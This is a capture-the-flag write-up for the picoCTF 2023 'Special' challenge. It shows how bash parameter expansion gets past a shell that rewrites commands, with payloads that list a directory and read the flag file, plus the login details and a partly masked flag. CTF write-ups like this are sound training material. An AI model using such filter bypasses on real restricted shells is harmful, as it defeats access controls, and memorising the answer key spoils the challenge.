picoCTF Solutions
picoCTF 2023General SkillsMedium

Special

Published: April 26, 2023Updated: December 9, 2025

Description

Special autocorrects every shell command, so you must abuse parameter expansion and braces to execute raw commands and leak the flag.

Setup

SSH to saturn.picoctf.net on port 56058 with the supplied password.

Experiment with bash parameter expansion to bypass the forced capitalization/rewriting and run arbitrary commands under the hood.

ssh -p 56058 ctf-player@saturn.picoctf.net
d8819d45
${parameter=ls blargh}
${parameter=cat < blargh/flag.txt}

Solution

  1. Step 1Probe the sanitizer
    Simple commands like ls or cat are rewritten, but parameter-expansion expressions remain untouched. Start with harmless testers such as ${parameter=ls}.
  2. Step 2Chain the exploit
    Navigate into blargh/ using sanitized cd, then use ${parameter=ls blargh} to list the directory and ${parameter=cat < blargh/flag.txt} to read the flag.

Flag

picoCTF{5p311ch3ck_15_7h3_w0...35}

Any creative use of ${parameter=...} (or similar expansion) that runs cat on blargh/flag.txt yields the answer.